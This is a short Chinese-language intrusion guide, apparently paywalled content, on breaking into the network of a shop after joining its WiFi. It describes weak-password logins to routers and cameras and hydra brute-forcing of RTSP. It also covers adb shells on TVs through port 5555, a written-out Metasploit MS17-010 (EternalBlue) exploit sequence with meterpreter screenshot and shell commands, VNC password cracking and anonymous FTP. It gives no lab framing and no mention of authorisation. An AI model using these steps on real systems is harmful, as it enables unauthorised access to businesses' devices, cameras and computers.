内网破解测试
第一步:连接WIFI
[pay]一般在店铺经常会用到的设备有摄像机,(菜单,广告)投屏电视,后台 s y 系统,路由器
1.路由器:路由器一般80端最有用,可以通过弱口令进行网页登录(有的甚至和WIFI密码一模一样)
2.摄像:一般开rtsp(554端口)和http(80端口)
80(http):网页登录,一般弱口令可以登录,或者找相关版本的设备漏洞登录设备后台
554(rtsp):用rtsp连接软件登录连接(推荐VCL)一般登录密码会和网页登录密码一致,实在不行可以用hydra爆破
3.投屏电视:电视可以说是最好进的,扫描看看有没有5555端口,使用adb直接连接,一般情况可以拿到shell
4.后台:一般为Windows系统,有的甚至是Windows的老版本(带洞的)
139端口:这里使用 ms17-010 (永恒之蓝)
比较复杂需要用到Linux系统(kali or termux)
安装msfconsole
命令:
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts [目标ip]
set thread 10 //分配好线程,可以给它增加线程,但不能加太多,线程过大靶机容易宕机蓝屏
exploit(run)
进入系统
meterpreter > ps ##查看靶机的进程
meterpreter > screenshot ##获得屏幕
meterpreter > shell ##获得shell
5900端口(vnc):使用vnc软件连接,推荐vnc viewer,有密码用密码本破解
21:anonymous匿名用户登录
还有可能会包含3306,21,22,80,可能需要爆破
[/pay]
如果有写不好的地方,谅解谅解